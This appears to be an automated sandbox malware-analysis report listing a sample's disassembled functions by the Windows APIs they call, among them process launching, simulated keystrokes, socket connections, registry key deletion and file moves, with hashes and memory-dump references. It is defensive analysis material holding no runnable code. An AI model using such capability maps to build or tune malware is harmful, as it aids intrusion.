SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 00A7BBFB

Memory Dump Source

Source File: 0000000A.00000002.2690890803.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000A.00000002.2690874240.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000A80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000AA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691001317.0000000000AB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691020753.0000000000AB9000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9f0000_Introduces.jbxd

Similarity

API ID: MessageSendWindow$ButtonCheckedEnabledLong
String ID:
API String ID: 4072528602-0
Opcode ID: 26c3760fe4484e95b2b488a2ab3595011adfa18f51eaa81daaae9bfe2174b2c0
Instruction ID: a13b3adb7b2d867673e37639ee7da7bf3abf8d2cdbfb0003895b2ab6d787e943
Opcode Fuzzy Hash: 26c3760fe4484e95b2b488a2ab3595011adfa18f51eaa81daaae9bfe2174b2c0
Instruction Fuzzy Hash: 8D718AB4614204AFDB25EF94CC94FFABBB9EF89340F10C059E949972A1CB71AC51CB60

Function 00A6FB07 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 177COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00A6FB31
_memset.LIBCMT ref: 00A6FBFA
ShellExecuteExW.SHELL32(?), ref: 00A6FC3F

Part of subcall function 009F4D37: __itow.LIBCMT ref: 009F4D62
Part of subcall function 009F4D37: __swprintf.LIBCMT ref: 009F4DAC

Part of subcall function 00A0436A: _wcscpy.LIBCMT ref: 00A0438D

GetProcessId.KERNEL32(00000000), ref: 00A6FCB6
CloseHandle.KERNEL32(00000000), ref: 00A6FCE5

Strings

@, xrefs: 00A6FC0E

Memory Dump Source

Source File: 0000000A.00000002.2690890803.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000A.00000002.2690874240.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000A80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000AA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691001317.0000000000AB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691020753.0000000000AB9000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9f0000_Introduces.jbxd

Similarity

API ID: _memset$CloseExecuteHandleProcessShell__itow__swprintf_wcscpy
String ID: @
API String ID: 3522835683-2766056989
Opcode ID: b85a76527ef7432d9b4c864823d3037469e5ba9092c933c242fde4222bb04a1e
Instruction ID: 437b63085c633a3ff32638de6c5aff96d5f89b57b9ec1eec334bcc9116a28d12
Opcode Fuzzy Hash: b85a76527ef7432d9b4c864823d3037469e5ba9092c933c242fde4222bb04a1e
Instruction Fuzzy Hash: FC61AC75A00619DFCB14EFA4D591AAEBBF5FF48310F148469E916AB391CB30AD41CF90

Function 00A5174C Relevance: 10.7, APIs: 7, Instructions: 166windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(?), ref: 00A5178B
GetKeyboardState.USER32(?), ref: 00A517A0
SetKeyboardState.USER32(?), ref: 00A51801
PostMessageW.USER32(?,00000101,00000010,?), ref: 00A5182F
PostMessageW.USER32(?,00000101,00000011,?), ref: 00A5184E
PostMessageW.USER32(?,00000101,00000012,?), ref: 00A51894
PostMessageW.USER32(?,00000101,0000005B,?), ref: 00A518B7

Memory Dump Source

Source File: 0000000A.00000002.2690890803.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000A.00000002.2690874240.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000A80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000AA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691001317.0000000000AB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691020753.0000000000AB9000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9f0000_Introduces.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: 94b0acdb8f4210f7b3cfde11698a6af7e92901a83044ce0cd41114ce64e45313
Instruction ID: 10d7857f095d0772361b9ab789052acd15aba07d299bb9d18174a8549788c881
Opcode Fuzzy Hash: 94b0acdb8f4210f7b3cfde11698a6af7e92901a83044ce0cd41114ce64e45313
Instruction Fuzzy Hash: FA51D4A09047D53EFB368338CC55BB67EE97B06306F088589E9D5458C3D2B8AC9CDB50

Function 00A51565 Relevance: 10.7, APIs: 7, Instructions: 165windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(00000000), ref: 00A515A4
GetKeyboardState.USER32(?), ref: 00A515B9
SetKeyboardState.USER32(?), ref: 00A5161A
PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00A51646
PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00A51663
PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00A516A7
PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00A516C8

Memory Dump Source

Source File: 0000000A.00000002.2690890803.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000A.00000002.2690874240.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000A80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000AA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691001317.0000000000AB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691020753.0000000000AB9000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9f0000_Introduces.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: 58e52145e4819e36b386f1821ea826a50b643a6f0ae4c55554355cfd879d19e2
Instruction ID: dc173ca9b9bd3b5b9debe94ac46419e9016704448d91d00c1463b1ebd979860d
Opcode Fuzzy Hash: 58e52145e4819e36b386f1821ea826a50b643a6f0ae4c55554355cfd879d19e2
Instruction Fuzzy Hash: A95104A06047D13DFB3283248C45BBABEA97B45302F0C8589F9D5468C3D6B4EC9CE750

Function 00A55BB8 Relevance: 10.6, APIs: 7, Instructions: 138timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32 ref: 00A55BC5
_wcsncpy.LIBCMT ref: 00A55BFA
_wcsncpy.LIBCMT ref: 00A55C2C
_wcsncpy.LIBCMT ref: 00A55C5F
_wcsncpy.LIBCMT ref: 00A55CA1
_wcsncpy.LIBCMT ref: 00A55CDB
_wcsncpy.LIBCMT ref: 00A55D0A

Memory Dump Source

Source File: 0000000A.00000002.2690890803.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000A.00000002.2690874240.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000A80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000AA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691001317.0000000000AB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691020753.0000000000AB9000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9f0000_Introduces.jbxd

Similarity

API ID: _wcsncpy$LocalTime
String ID:
API String ID: 2945705084-0
Opcode ID: cc21a76a452c529090a3252ee176dcc1f9bade39ce84e7f2d9a6838e9629ccad
Instruction ID: e41dfbf980baee7c8dfb34ff006ffd80e2c03f4bfcf37b86d2fed93c96389763
Opcode Fuzzy Hash: cc21a76a452c529090a3252ee176dcc1f9bade39ce84e7f2d9a6838e9629ccad
Instruction Fuzzy Hash: B8417F67C1061875CB51FBF4C946ACFB7B8AF04311F508856F909E3261E634E6A983A5

Function 00A53B64 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 111filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 00A54BC3: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00A53B8A,?), ref: 00A54BE0

Part of subcall function 00A54BC3: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00A53B8A,?), ref: 00A54BF9

lstrcmpiW.KERNEL32(?,?), ref: 00A53BAA
_wcscmp.LIBCMT ref: 00A53BC6
MoveFileW.KERNEL32(?,?), ref: 00A53BDE
_wcscat.LIBCMT ref: 00A53C26
SHFileOperationW.SHELL32(?), ref: 00A53C92

Strings

\*.*, xrefs: 00A53C20

Memory Dump Source

Source File: 0000000A.00000002.2690890803.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000A.00000002.2690874240.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000A80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000AA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691001317.0000000000AB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691020753.0000000000AB9000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9f0000_Introduces.jbxd

Similarity

API ID: FileFullNamePath$MoveOperation_wcscat_wcscmplstrcmpi
String ID: \*.*
API String ID: 1377345388-1173974218
Opcode ID: 2ae3a300cf5775b0b6024a58b13d9bc55fc539000e14b29005c6727ec11f51c5
Instruction ID: a280b884ece22d556d4646f4efdd0cb2dfcb169cb8d7509523b321be58fc897e
Opcode Fuzzy Hash: 2ae3a300cf5775b0b6024a58b13d9bc55fc539000e14b29005c6727ec11f51c5
Instruction Fuzzy Hash: 58416F7250C3449ACB52EB64D585ADBB7E8AF89381F40192EF88AC3191EB34D68CC752

Function 00A778B6 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 103windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00A778CF
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00A77976
IsMenu.USER32(?), ref: 00A7798E
InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00A779D6
DrawMenuBar.USER32 ref: 00A779E9

Strings

0, xrefs: 00A778C3

Memory Dump Source

Source File: 0000000A.00000002.2690890803.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000A.00000002.2690874240.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000A80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000AA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691001317.0000000000AB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691020753.0000000000AB9000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9f0000_Introduces.jbxd

Similarity

API ID: Menu$Item$DrawInfoInsert_memset
String ID: 0
API String ID: 3866635326-4108050209
Opcode ID: d237020d03470824369dae43b036cd3ffb6822d17bb6ba4f6c551a66540a41e3
Instruction ID: 5d5d4aed9d742feb204c5ab424a761e84ec92c2db3dc76ebaf9ae005e473977f
Opcode Fuzzy Hash: d237020d03470824369dae43b036cd3ffb6822d17bb6ba4f6c551a66540a41e3
Instruction Fuzzy Hash: 58412675A05209EFDB50DF94DC84EAEBBB9FB09310F04C129EA5997250D770AD54CFA0

Function 00A71602 Relevance: 10.6, APIs: 7, Instructions: 101registryCOMMON

Download Yara Rule

APIs

RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?), ref: 00A71631
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00A7165B
FreeLibrary.KERNEL32(00000000), ref: 00A71712

Part of subcall function 00A71602: RegCloseKey.ADVAPI32(?), ref: 00A71678
Part of subcall function 00A71602: FreeLibrary.KERNEL32(?), ref: 00A716CA
Part of subcall function 00A71602: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00A716ED

RegDeleteKeyW.ADVAPI32(?,?), ref: 00A716B5

Memory Dump Source

Source File: 0000000A.00000002.2690890803.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000A.00000002.2690874240.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000A80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000AA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691001317.0000000000AB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691020753.0000000000AB9000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9f0000_Introduces.jbxd

Similarity

API ID: EnumFreeLibrary$CloseDeleteOpen
String ID:
API String ID: 395352322-0
Opcode ID: 729c2d143fbea74dce89bbcf0575265eb6c999f74b6f31c70ca9fd1b768dd6f8
Instruction ID: d3635226092d2206c2f7093f075054525d5b67d4385001bcdc23174834980319
Opcode Fuzzy Hash: 729c2d143fbea74dce89bbcf0575265eb6c999f74b6f31c70ca9fd1b768dd6f8
Instruction Fuzzy Hash: 86313CB1900109BFDB14DFD4DC89EFEB7BCEF08300F148169E906A2150EB749E499BA0

Function 00A768F2 Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 00A76911
GetWindowLongW.USER32(01026058,000000F0), ref: 00A76944
GetWindowLongW.USER32(01026058,000000F0), ref: 00A76979
SendMessageW.USER32(?,000000F1,00000000,00000000), ref: 00A769AB
SendMessageW.USER32(?,000000F1,00000001,00000000), ref: 00A769D5
GetWindowLongW.USER32(?,000000F0), ref: 00A769E6
SetWindowLongW.USER32(?,000000F0,00000000), ref: 00A76A00

Memory Dump Source

Source File: 0000000A.00000002.2690890803.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000A.00000002.2690874240.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000A80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000AA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691001317.0000000000AB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691020753.0000000000AB9000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9f0000_Introduces.jbxd

Similarity

API ID: LongWindow$MessageSend
String ID:
API String ID: 2178440468-0
Opcode ID: ee33b3acf1eb6200a3389884c487c7b36e40db0fd70822f94ead29b5a0a8ca86
Instruction ID: 2363957b2d33da70de4386134abe6090c95efed8d90f2fc3075f5fe5e3ffc157
Opcode Fuzzy Hash: ee33b3acf1eb6200a3389884c487c7b36e40db0fd70822f94ead29b5a0a8ca86
Instruction Fuzzy Hash: F9314630604551AFDB20CF98DC88F6937E1FB99310F1882A4F6088F2B2CBB1AC95CB50

Function 00A4E287 Relevance: 10.6, APIs: 7, Instructions: 95memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00A4E2CA
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00A4E2F0
SysAllocString.OLEAUT32(00000000), ref: 00A4E2F3
SysAllocString.OLEAUT32(?), ref: 00A4E311
SysFreeString.OLEAUT32(?), ref: 00A4E31A
StringFromGUID2.OLE32(?,?,00000028), ref: 00A4E33F
SysAllocString.OLEAUT32(?), ref: 00A4E34D

Memory Dump Source

Source File: 0000000A.00000002.2690890803.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000A.00000002.2690874240.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000A80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000AA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691001317.0000000000AB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691020753.0000000000AB9000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9f0000_Introduces.jbxd

Similarity

API ID: String$Alloc$ByteCharMultiWide$FreeFrom
String ID:
API String ID: 3761583154-0
Opcode ID: 7b4e5de7311bc8b1689ef502f45e2656a9e8b7f6efcb55609eed150bd650b12d
Instruction ID: b0e46553e1b218479eb4bd8c022cdb95156c0650b4ec255560ed2474cef4d5b5
Opcode Fuzzy Hash: 7b4e5de7311bc8b1689ef502f45e2656a9e8b7f6efcb55609eed150bd650b12d
Instruction Fuzzy Hash: 4D21607A604219BF9F50DFA8DC88CBB77ACFF49360B448125FA14DB250D670AD868760

Function 00A6685E Relevance: 10.6, APIs: 7, Instructions: 94networkCOMMON

Download Yara Rule

APIs

Part of subcall function 00A68475: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00A684A0

socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00A668B1
WSAGetLastError.WSOCK32(00000000), ref: 00A668C0
ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00A668F9
connect.WSOCK32(00000000,?,00000010), ref: 00A66902
WSAGetLastError.WSOCK32 ref: 00A6690C
closesocket.WSOCK32(00000000), ref: 00A66935
ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00A6694E

Memory Dump Source

Source File: 0000000A.00000002.2690890803.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000A.00000002.2690874240.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000A80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000AA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691001317.0000000000AB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691020753.0000000000AB9000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9f0000_Introduces.jbxd

Similarity

API ID: ErrorLastioctlsocket$closesocketconnectinet_addrsocket
String ID:
API String ID: 910771015-0
Opcode ID: 5d3ffc02b86d2f06715e6ad1c883ca78c0ff9207c519b379db02dafae93b1a09
Instruction ID: 25842487f8a30d4328d83c9dbedc61422d30c06dc4e3a3578bc1796d56316548
Opcode Fuzzy Hash: 5d3ffc02b86d2f06715e6ad1c883ca78c0ff9207c519b379db02dafae93b1a09
Instruction Fuzzy Hash: FB317F71600218AFDB10AF64CC85FBE7BB9EB44725F048129FE05AB291DB74AD458BA1

Function 00A4E360 Relevance: 10.6, APIs: 7, Instructions: 90memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00A4E3A5
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00A4E3CB
SysAllocString.OLEAUT32(00000000), ref: 00A4E3CE
SysAllocString.OLEAUT32 ref: 00A4E3EF
SysFreeString.OLEAUT32 ref: 00A4E3F8
StringFromGUID2.OLE32(?,?,00000028), ref: 00A4E412
SysAllocString.OLEAUT32(?), ref: 00A4E420

Memory Dump Source

Source File: 0000000A.00000002.2690890803.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000A.00000002.2690874240.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000A80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000AA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691001317.0000000000AB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691020753.0000000000AB9000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9f0000_Introduces.jbxd

Similarity

API ID: String$Alloc$ByteCharMultiWide$FreeFrom
String ID:
API String ID: 3761583154-0
Opcode ID: c74647c790166bb822df16cc8c3326b051abd67712614eda239e05205e38f1d3
Instruction ID: 3e0679a9a878076c1b609aa12a4c40bd191c06437bd142b62b99a7f6366507c6
Opcode Fuzzy Hash: c74647c790166bb822df16cc8c3326b051abd67712614eda239e05205e38f1d3
Instruction Fuzzy Hash: E1214439604208AFAB50DFA8DC89DAE77ECFF49360B008525FA15CB260D671EC858B64

Function 00A77BF2 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON

Download Yara Rule

APIs

Part of subcall function 009F2111: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 009F214F
Part of subcall function 009F2111: GetStockObject.GDI32(00000011), ref: 009F2163
Part of subcall function 009F2111: SendMessageW.USER32(00000000,00000030,00000000), ref: 009F216D

SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00A77C57
SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 00A77C64
SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00A77C6F
SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00A77C7E
SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00A77C8A

Strings

Msctls_Progress32, xrefs: 00A77C28

Memory Dump Source

Source File: 0000000A.00000002.2690890803.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000A.00000002.2690874240.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000A80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000AA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691001317.0000000000AB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691020753.0000000000AB9000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9f0000_Introduces.jbxd

Similarity

API ID: MessageSend$CreateObjectStockWindow
String ID: Msctls_Progress32
API String ID: 1025951953-3636473452
Opcode ID: 26d76a679ca85fbd549c6d6bbef55be108077ab1088e3d931323fedb641e2a18
Instruction ID: f1faf0614d9f7159ef38a95352a0c49a4bfe105b4c9f459ffd555894fa7d8398
Opcode Fuzzy Hash: 26d76a679ca85fbd549c6d6bbef55be108077ab1088e3d931323fedb641e2a18
Instruction Fuzzy Hash: 7E1163B1154219BEEF159F60CC85EEB7F5DEF48798F018115BA08A6090CB729C21DBA4

Function 00A19D16 Relevance: 10.5, APIs: 7, Instructions: 45threadCOMMON

Download Yara Rule

APIs

__init_pointers.LIBCMT ref: 00A19D16

Part of subcall function 00A133B7: EncodePointer.KERNEL32(00000000), ref: 00A133BA
Part of subcall function 00A133B7: __initp_misc_winsig.LIBCMT ref: 00A133D5
Part of subcall function 00A133B7: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00A1A0D0
Part of subcall function 00A133B7: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00A1A0E4
Part of subcall function 00A133B7: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00A1A0F7
Part of subcall function 00A133B7: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00A1A10A
Part of subcall function 00A133B7: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00A1A11D
Part of subcall function 00A133B7: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00A1A130
Part of subcall function 00A133B7: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 00A1A143
Part of subcall function 00A133B7: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00A1A156
Part of subcall function 00A133B7: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 00A1A169
Part of subcall function 00A133B7: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 00A1A17C
Part of subcall function 00A133B7: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 00A1A18F
Part of subcall function 00A133B7: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00A1A1A2
Part of subcall function 00A133B7: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00A1A1B5
Part of subcall function 00A133B7: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 00A1A1C8
Part of subcall function 00A133B7: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 00A1A1DB
Part of subcall function 00A133B7: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 00A1A1EE

__mtinitlocks.LIBCMT ref: 00A19D1B
__mtterm.LIBCMT ref: 00A19D24

Part of subcall function 00A19D8C: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,00A19D29,00A17EFD,00AACD38,00000014), ref: 00A19E86
Part of subcall function 00A19D8C: _free.LIBCMT ref: 00A19E8D
Part of subcall function 00A19D8C: DeleteCriticalSection.KERNEL32(00AB0C00,?,?,00A19D29,00A17EFD,00AACD38,00000014), ref: 00A19EAF

__calloc_crt.LIBCMT ref: 00A19D49
__initptd.LIBCMT ref: 00A19D6B
GetCurrentThreadId.KERNEL32 ref: 00A19D72

Memory Dump Source

Source File: 0000000A.00000002.2690890803.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000A.00000002.2690874240.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000A80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000AA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691001317.0000000000AB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691020753.0000000000AB9000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9f0000_Introduces.jbxd

Similarity

API ID: AddressProc$CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
String ID:
API String ID: 3567560977-0
Opcode ID: b7c93f25a9de448d7bdaf5e3bb4fb091fdf38c930e4494b06468e3c96cbeaf02
Instruction ID: 99ccd4d842d453659e2a845fe137824dea76470be11ad817023fb98d141a14e2
Opcode Fuzzy Hash: b7c93f25a9de448d7bdaf5e3bb4fb091fdf38c930e4494b06468e3c96cbeaf02
Instruction Fuzzy Hash: 4DF06D3290A7216AE6747BB47E236CB2694DF41770F210719F4A0D50E3EF10C8C28191

Function 00A141B9 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 24libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,00A14282,?), ref: 00A141D3
GetProcAddress.KERNEL32(00000000), ref: 00A141DA
EncodePointer.KERNEL32(00000000), ref: 00A141E6
DecodePointer.KERNEL32(00000001,00A14282,?), ref: 00A14203

Strings

combase.dll, xrefs: 00A141CE
RoInitialize, xrefs: 00A141C2

Memory Dump Source

Source File: 0000000A.00000002.2690890803.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000A.00000002.2690874240.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000A80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000AA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691001317.0000000000AB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691020753.0000000000AB9000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9f0000_Introduces.jbxd

Similarity

API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
String ID: RoInitialize$combase.dll
